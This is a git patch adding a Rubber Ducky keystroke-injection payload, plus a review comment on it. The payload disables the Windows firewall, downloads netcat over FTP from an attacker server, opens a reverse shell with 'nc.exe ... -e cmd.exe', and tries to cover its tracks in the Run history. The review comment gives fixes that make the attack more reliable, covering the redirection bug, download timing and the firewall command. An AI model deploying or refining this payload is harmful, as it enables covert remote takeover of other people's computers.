From c93000ee6a7752621d87cb6c8328f7d1681a8383 Mon Sep 17 00:00:00 2001 From: Vinicius Date: Thu, 2 Mar 2017 16:47:37 -0300 Subject: [PATCH] Payload netcat FTP download and reverse shell --- ...d-netcat-FTP-download-and-reverse-shell.md | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 Payload-netcat-FTP-download-and-reverse-shell.md diff --git a/Payload-netcat-FTP-download-and-reverse-shell.md b/Payload-netcat-FTP-download-and-reverse-shell.md new file mode 100644 index 0000000..73a76b3 --- /dev/null +++ b/Payload-netcat-FTP-download-and-reverse-shell.md @@ -0,0 +1,56 @@ +This script will: +* create an FTP script that logs you in to the FTP server and download netcat +* delete the FTP script file +* run netcat in daemon mode +* run cmd.exe one more time to conceal the command we used in the run history. + +Fill in the required information where you see the brackets. +```c +DELAY 10000 +GUI r +DELAY 200 +STRING cmd +ENTER +DELAY 600 +STRING cd %USERPROFILE% +ENTER +DELAY 100 +STRING netsh firewall set opmode disable +ENTER +DELAY 2000 +STRING echo open [IP] [PORT] > ftp.txt +ENTER +DELAY 100 +STRING echo [USERNAME]>> ftp.txt +ENTER +DELAY 100 +STRING echo [PASSWORD]>> ftp.txt +ENTER +DELAY 100 +STRING echo bin >> ftp.txt +ENTER +DELAY 100 +STRING echo get nc.exe >> ftp.txt +ENTER +DELAY 100 +STRING echo bye >> ftp.txt +ENTER +DELAY 100 +STRING ftp -s:ftp.txt +ENTER +STRING del ftp.txt & exit +ENTER +DELAY 2000 +GUI r +DELAY 200 +STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d +ENTER +DELAY 2000 +GUI r +DELAY 200 +STRING cmd +ENTER +DELAY 600 +STRING exit +ENTER +``` \ No newline at end of file
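Review bot: `echo [USERNAME]>> ftp.txt` and `echo [PASSWORD]>> ftp.txt` have no space before `>>`, unlike the other echo lines, so a username or password that ends in a digit breaks the login: cmd parses the trailing digit together with `>>` as a file-handle redirection (`1>>`, `2>>`) and the digit never reaches ftp.txt. Write `echo [USERNAME] >> ftp.txt` as the `bin`/`get`/`bye` lines already do (ftp ignores the trailing space), or at least document the restriction next to "Fill in the required information". The last bullet of the description, "run cmd.exe one more time to conceal the command we used in the run history", overstates what the closing `GUI r` / `STRING cmd` / `STRING exit` sequence does: the Run dialog history is the RunMRU list, which keeps multiple entries ordered by recency, so the `nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d` entry is still recorded, just one position further down; say it only pushes the nc command off the top, or drop the claim. Timing: every other step waits for the previous command, but the only pause between `ftp -s:ftp.txt` and launching `nc.exe` from Run is the `DELAY 2000` after `del ftp.txt & exit`, so on anything but a fast link nc.exe is started before the download has finished and the payload fails with a file-not-found; add a DELAY sized to the transfer before the `del`. `netsh firewall set opmode disable` uses the old `netsh firewall` context, which newer Windows releases reject in favour of `netsh advfirewall set allprofiles state off`, and both forms require an elevated prompt; the cmd opened from the Run dialog is not elevated and the result is never checked, so on a standard user account this line only generates noise. Since the connection is an outbound connect-back, consider removing the firewall step altogether or documenting that it needs admin rights. Finally, the code fence is tagged ```c but the content is Ducky Script; drop the language tag so the README does not render it as C.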